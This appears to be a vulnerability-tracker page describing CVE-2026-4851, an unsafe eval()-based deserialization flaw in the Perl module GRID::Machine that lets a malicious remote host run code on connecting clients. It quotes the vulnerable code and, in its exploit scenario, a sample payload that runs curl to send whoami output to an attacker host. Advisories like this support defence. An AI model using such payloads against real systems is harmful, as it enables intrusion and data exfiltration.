Skip to main content

Grid EUVD-2026-16957

| CVE-2026-4851 CRITICAL
Deserialization of Untrusted Data (CWE-502)
2026-03-29 CPANSec
Deserialization RCE Grid
9.8
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
EUVD ID Assigned
Mar 29, 2026 - 01:00 euvd
EUVD-2026-16957
Analysis Generated
Mar 29, 2026 - 01:00 vuln.today
CVE Published
Mar 29, 2026 - 00:22 nvd
CRITICAL 9.8

DescriptionCVE.org

GRID::Machine versions through 0.127 for Perl allows arbitrary code execution via unsafe deserialization.

GRID::Machine provides Remote Procedure Calls (RPC) over SSH for Perl. The client connects to remote hosts to execute code on them. A compromised or malicious remote host can execute arbitrary code back on the client through unsafe deserialization in the RPC protocol.

read_operation() in lib/GRID/Machine/Message.pm deserialises values from the remote side using eval()

$arg .= '$VAR1'; my $val = eval "no strict; $arg";

line 40-41

$arg is raw bytes from the protocol pipe. A compromised remote host can embed arbitrary perl in the Dumper-formatted response:

$VAR1 = do { system("..."); };

This executes on the client silently on every RPC call, as the return values remain correct.

This functionality is by design but the trust requirement for the remote host is not documented in the distribution.

AnalysisAI

Arbitrary Perl code execution in GRID::Machine through version 0.127 occurs when clients connect to remote hosts via RPC over SSH, as the client-side deserializer uses eval() on untrusted data from the remote peer without validation. A compromised or malicious remote host can inject arbitrary Perl code into Dumper-formatted responses that executes silently on the client during RPC calls, while maintaining correct return values to avoid detection. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Malicious remote host sends crafted RPC message
Exploit
Unsafe eval() deserializes attacker payload
Impact
Arbitrary code executes on client host
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Attacker must control or compromise a remote SSH host that a GRID::Machine client connects to. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment This vulnerability represents critical real-world risk despite the absence of CVSS and EPSS scores in the provided data. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker compromises a remote server that a GRID::Machine client connects to regularly. When the client makes any RPC call to the compromised host, the attacker returns a Dumper-formatted response containing embedded Perl code (e.g., $VAR1 = do { system("curl http://attacker.com/exfiltrate?data=$(whoami)"); };). …
Remediation Upgrade GRID::Machine to a version greater than 0.127 once a patched release is available from the maintainer (Casiano Rodriguez-Leon). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-16957 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy